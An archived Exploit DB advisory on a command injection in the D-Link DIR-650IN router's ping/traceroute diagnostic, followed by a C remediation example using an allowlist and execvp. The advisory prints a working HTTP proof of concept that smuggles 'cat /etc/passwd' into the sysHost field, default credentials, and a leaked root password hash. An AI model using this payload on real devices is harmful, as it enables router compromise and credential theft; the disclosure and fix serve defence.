
[webapps] D-Link DIR-650IN - Authenticated Command Injection

Exploit DB · Archived Apr 10, 2026



EDB-ID: 52508
CVE: N/A
Author: SANJAY SINGH
Type: WEBAPPS
Platform: MULTIPLE
Date: 2026-04-10

# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection
# Date: 2023-01-08
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.dlink.com
# Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
# Version: Firmware V1.04 (REQUIRED)
# Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108
# CVE: N/A (Version included now, previously missing)

Description:
The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.
The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands.
Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.

Steps to Reproduce:
1. Log in to the router web interface.
2. Go to Management → Diagnostic.
3. Select Ping or Traceroute.
4. Enter: google.com | cat /etc/passwd
5. Click Apply.
6. Output includes /etc/passwd contents.

HTTP PoC:

POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded

submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply

Response Extract:

root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

References:
https://www.dlink.com
https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
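
One way to close the flaw described above, as an added example that is not from the original advisory or from D-Link's firmware: the diagnostic handler checks sysHost against a hostname allowlist and starts ping with execvp, so the value is never parsed by a shell. The function names host_is_safe and run_ping and the count limit of 10 are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check for a hostname or IPv4 literal: dot-separated labels of
 * 1-63 chars from [A-Za-z0-9-], no leading/trailing hyphen, total <= 253. */
int host_is_safe(const char *h)
{
    size_t n = h ? strlen(h) : 0, label = 0;
    if (n == 0 || n > 253)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)h[i];
        if (c == '.') {
            if (label == 0 || h[i - 1] == '-')
                return 0;          /* empty label or label ending in '-' */
            label = 0;
        } else if (isalnum(c) || (c == '-' && label > 0)) {
            if (++label > 63)
                return 0;
        } else {
            return 0;              /* '|', ';', '$', space, quotes, ... */
        }
    }
    return label > 0 && h[n - 1] != '-';
}

/* Run ping without a shell: the host is a single argv element, never
 * command text. Returns ping's exit status, or -1 if input is rejected.
 * The 1..10 bound on count (checkNum) is an assumption of this example. */
int run_ping(const char *host, unsigned count)
{
    char cnt[8];
    int status;
    if (!host_is_safe(host) || count == 0 || count > 10)
        return -1;
    snprintf(cnt, sizeof cnt, "%u", count);
    pid_t pid = fork();
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", cnt, (char *)host, NULL };
        execvp("ping", argv);
        _exit(127);                /* exec failed */
    }
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Rejecting a leading hyphen also keeps the value from being read as a ping option.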
Article Info
Source: Exploit DB
Category: Vulnerabilities & CVEs
Published: Apr 10, 2026
Archived: Apr 10, 2026